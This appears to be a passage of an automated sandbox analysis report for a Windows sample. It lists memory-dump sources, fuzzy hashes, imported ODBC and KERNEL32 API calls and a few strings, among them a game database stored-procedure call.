                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27ac55f23973a333f8a171e4ec5780a7fba4221bab6f9a449c01363214d53d89
                                                                                      • Instruction ID: 5cd090c368f0fc6e1218d4a9c93c1383d0696e2e3b8651ba0dea24f37f40de2d
                                                                                      • Opcode Fuzzy Hash: 27ac55f23973a333f8a171e4ec5780a7fba4221bab6f9a449c01363214d53d89
                                                                                      • Instruction Fuzzy Hash: C541FCB5A40118ABDB24DB09CC51FEA7375EF65708F10C2C9F6986B381D6B5ADC08F94
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00444BA8
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00444BCC
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444BF0
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444C14
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000E7,?), ref: 00444C38
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?), ref: 00444C5C
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?), ref: 00444C80
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,0000005D,?), ref: 00444CA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7190911924df4cec7d738ef1ad3d15be8b0738ac8162aba054cbee0d33f73dbd
                                                                                      • Instruction ID: b28c987220615485632621b24c4385a89706e97525a92cd8178c990757681605
                                                                                      • Opcode Fuzzy Hash: 7190911924df4cec7d738ef1ad3d15be8b0738ac8162aba054cbee0d33f73dbd
                                                                                      • Instruction Fuzzy Hash: 8F41CBB1E44508ABEB34DBA9CC51FAE7779EB48718F20C20DF6716B382D675A8108F54
                                                                                      APIs
                                                                                        • Part of subcall function 00486A4E: GetLastError.KERNEL32(?,?,004925B3,?,00490D1F,00000000,?,00000000,00000000,?,00000000,00487C03,004D58FC,004D5900,00000018,004881D5), ref: 00486A50
                                                                                        • Part of subcall function 00486A4E: GetCurrentThreadId.KERNEL32 ref: 00486A9D
                                                                                        • Part of subcall function 00486A4E: SetLastError.KERNEL32(00000000,?,00490D1F,00000000,?,00000000,00000000,?,00000000,00487C03,004D58FC,004D5900,00000018,004881D5,004D5910,00000008), ref: 00486AB4
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004882D8
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004883D5
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048842E
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048844B
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048846E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLast$CurrentThread
                                                                                      • String ID: DHN
                                                                                      • API String ID: 1370660682-555111828
                                                                                      • Opcode ID: c14546e9891461e1ea036a516e6c8680dfe2b3b6abf7acfaaaf4cad53b49d4e5
                                                                                      • Instruction ID: 9f80dfbc1139386b9314d64e7b7f07811ad79874ea15466bed535525f6ea9af5
                                                                                      • Opcode Fuzzy Hash: c14546e9891461e1ea036a516e6c8680dfe2b3b6abf7acfaaaf4cad53b49d4e5
                                                                                      • Instruction Fuzzy Hash: 4E610876A00305AFDB14BF99CC41B6EB7F6EB84724F64492FF90097281DB79A9408B18
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(004E9540), ref: 0045F771
                                                                                      • __time32.LIBCMT ref: 0045F7A4
                                                                                        • Part of subcall function 004822FD: GetSystemTimeAsFileTime.KERNEL32(0045D0F3,?,?,?,0045D0F3,?), ref: 00482306
                                                                                        • Part of subcall function 004822FD: __aulldiv.LIBCMT ref: 00482326
                                                                                      • LeaveCriticalSection.KERNEL32(004E9540,?,?), ref: 0045F994
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 0045F9B1
                                                                                      • SendMessageA.USER32(?,00000005,00000007,00000000), ref: 0045F9C3
                                                                                      Strings
                                                                                      • %02d/%02d/%02d %02d:%02d:%02d> %s, xrefs: 0045F945
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionTime$EnterFileInvalidateLeaveMessageRectSendSystem__aulldiv__time32
                                                                                      • String ID: %02d/%02d/%02d %02d:%02d:%02d> %s
                                                                                      • API String ID: 470133166-2547019025
                                                                                      • Opcode ID: 7998ceecf7e7003b00879658b5b82b3ef7aef4a01fdb0dc52cdbd92b5d4d92c5
                                                                                      • Instruction ID: 1ae57a3f0f0c79b230d0dbdebffe31f1230e0b76f4d5de6122f476e911e5818b
                                                                                      • Opcode Fuzzy Hash: 7998ceecf7e7003b00879658b5b82b3ef7aef4a01fdb0dc52cdbd92b5d4d92c5
                                                                                      • Instruction Fuzzy Hash: A171A3B5A00218ABCB10DF54DC91FDA73B9FF48304F00C1A9E9499B292DB75AE85CF95
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_CompleteCharTitle] (?, ?, ?)},000000FD), ref: 0043AACF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043AB0E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043AB43
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043AB7B
                                                                                      • #72.ODBC32(00000000,?,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000), ref: 0043AC1B
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_CompleteCharTitle] (?, ?, ?)}, xrefs: 0043AAC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_CompleteCharTitle] (?, ?, ?)}
                                                                                      • API String ID: 0-2525810167
                                                                                      • Opcode ID: c81acd77ea15679b44de9af10b9ef631957096341c1d6173e4fe21f8d7451072
                                                                                      • Instruction ID: 5a7d729f4d4881c434e8ecbf914b442c255fe06f7af2c5103b34cb44b1850100
                                                                                      • Opcode Fuzzy Hash: c81acd77ea15679b44de9af10b9ef631957096341c1d6173e4fe21f8d7451072
                                                                                      • Instruction Fuzzy Hash: 9A415E75A40698AFDB24CF44CC51F99B374EB84B1AF2489C9F6187B3D1D6B1AE808F44
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000), ref: 0044511B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000), ref: 0044514B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044517B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 004451AB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 004451DB
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044520B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044523B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af9308a52c5199bd7004dd9b8d927823fc87f0a858a0d32b02c2147684ab2428
                                                                                      • Instruction ID: 17d5b8f2e2d445c82f5652981dfee6377c7bab867ad8d66a80304a4180c9b1cc
                                                                                      • Opcode Fuzzy Hash: af9308a52c5199bd7004dd9b8d927823fc87f0a858a0d32b02c2147684ab2428
                                                                                      • Instruction Fuzzy Hash: A7410C70B00218BFEB64DB09CC51FAA7335EB45718F10C2C8F69D6A381DA71AD848F56
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00449395
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 004493C5
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004493F5
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00449425
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000F0,?), ref: 00449455
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000002,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,0000005D,?), ref: 00449485
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000002,00000000,?,00000000,00000001,?,00000002,00000000,?,00000000,0000005D,?), ref: 004494B5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
